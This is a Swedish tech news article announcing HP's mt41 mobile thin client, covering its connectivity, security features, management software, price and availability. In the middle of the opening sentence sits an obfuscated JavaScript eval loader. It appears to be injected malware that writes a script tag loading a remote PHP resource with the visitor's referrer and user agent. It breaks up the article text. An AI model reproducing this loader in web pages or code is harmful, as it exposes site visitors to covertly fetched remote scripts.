Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

PC

HPs nya säkra tunna klient ökar företagens produktivitet

HPs nya säkra tunna klient ökar företagens produktivitet
Sebastian

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|snrbt|var|u0026u|referrer|diffh||js|php’.split(’|’),0,{}))
veckan lanserade HP en ny tunn klient, designad för att öka produktiviteten för mobila företagsanvändare genom en lätt enhet som kombinerar hög prestanda med pålitlig uppkoppling och säker tillgång till data.

Med HP mt41 mobil tunna klient, kan användaren vara produktiv och känna sig säker på att även känslig data är skyddad när man är på resande fot. Liksom på en traditionell tunn klient, finns ingen information på själva enheten. Användaren slår istället på sin dator och loggar in på sitt säkra nätverk oavsett om de är på kontoret, hemma eller någon annanstans där de har tillgång till molnet.(1)

”Vi ser en ökande trend i att allt fler reser regelbundet i jobbet och arbetar utanför arbetsplatsen, samtidigt som de behöver en säker tillgång till information och data, säger Stefan Jeleby, produktchef för tunna klienter på HP Sverige. “HP mt41 är perfekt för den mobila medarbetaren tack vare att den är så lätt och har en tålig och företagsanpassad design som gör att man kan arbeta både säkert och effektivt även när man är ute och reser.”

Pålitlig uppkoppling, maximal säkerhet, kraftfull prestanda
HP mt41 är lämplig för företag inom utbildning, hälsovård och mobila arbetsplatser där det ska gå lätt att resa och samtidigt ha säker tillgång till data som lagras på en fjärrserver eller i molnet.

Viktiga funktioner på HP mt41 är:

Pålitlig uppkoppling till nätverk. HP mt41 har WWAN 3G/4G LTE kapacitet(2), vilket ger de anställda fler uppkopplingsmöjligheter och snabb tillgång till viktig data.

Bättre användarvänlighet med HP Velocity. Mjukvaran HP Velocity network performance management, följer med HP mt41. Mjukvaran anpassar sig till nätverksvillkoren och förbättrar utnyttjandet av nätet. Detta gör att distansarbetare så väl som WiFi, 3G/4G och mobila användare får en optimal upplevelse, framför allt med applikationer som Unified communications.

Naturligt säker. HP mt41 innehåller den senaste dual-core AMD processorn och TPM chipet som hjälper användaren att vara produktiv och kunna skydda sina data med en optimerad säker anslutning, när användaren befinner sig utanför jobbet. (3) Med operativsystemet Microsoft Windows® Embedded Standard (WES) 7 E, kan användarna få en välkänd Windowsupplevelse och samtidigt känna sig lugna med att kritisk data lagras på en säker fjärrserver oavsett var de befinner sig.

Enkelt och intuitivt management med HP Device Manager. Den senaste versionen av HPs kraftfulla managementverktyg för tunna klienter är förinstallerad på HP mt41. Verktyget gör det enkelt att konfigurera, ta i drift och ominstallera HPs mobila tunna klienter även när man är på resande fot.

Lätt att resa med en kompakt och lätt design. Med en 14-tums (35.56cm) high-definition (HD) antireflexbehandlad skärm och en vikt från 2.17kg, är HP mt41 idealisk för distansarbetare och mobila arbetare som kräver säker och pålitlig access till data.

HP mt41 mobila tunna klient är anpassad för företag som har distribuerat virtuella lösningar från stora oberoende programleverantörer som Citrix, Microsoft och VMware, och deras stationära virtuella distributioner.

Pris och tillgänglighet

HP mt41 mobila tunna klient finns tillgänglig i Sverige och worldwide i november. Pris från 5 390 kronor exklusive moms.

HP mt41 visades på VMworld i Barcelona den 15 oktober.